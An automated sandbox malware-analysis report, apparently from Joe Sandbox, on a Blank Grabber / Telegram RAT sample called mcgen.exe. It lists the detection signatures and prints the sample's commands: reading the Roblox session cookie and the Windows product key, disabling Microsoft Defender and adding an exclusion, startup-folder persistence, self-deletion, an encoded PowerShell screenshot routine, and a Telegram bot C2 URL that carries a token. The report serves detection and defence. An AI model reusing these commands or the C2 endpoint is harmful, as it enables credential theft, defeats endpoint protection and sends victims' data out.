cmd.exe (PID: 7888 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 8052 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 8076 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 8152 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7428 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8180 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7740 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7184 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7804 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7580 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7516 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7236 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7256 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7612 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7060 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 2300 cmdline: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3820 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8072 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8172 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8160 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7964 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5360 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6564 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4188 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7488 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7284 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\mcgen.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 6540 cmdline: ping localhost -n 3 MD5: 2F46799D79D22AC72C241EC0322B011D)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendMessage"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI32122\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2124495523.0000024512162000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2519812485.000002C54FAC3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.2124495523.0000024512164000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2531278719.000002C54FC26000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mcgen.exe PID: 3212	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: mcgen.exe PID: 7020	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: mcgen.exe PID: 7020	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mcgen.exe PID: 7020	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'", ProcessId: 6104, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 3196, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *", ProcessId: 7060, ProcessName: cmd.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Ping/Del Command Combination

Source: Process started

Author: Ilya Krestinichev: Data: Command: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\mcgen.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\mcgen.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\mcgen.exe"", ProcessId: 7772, ProcessName: cmd.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\mcgen.exe, ProcessId: 7020, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI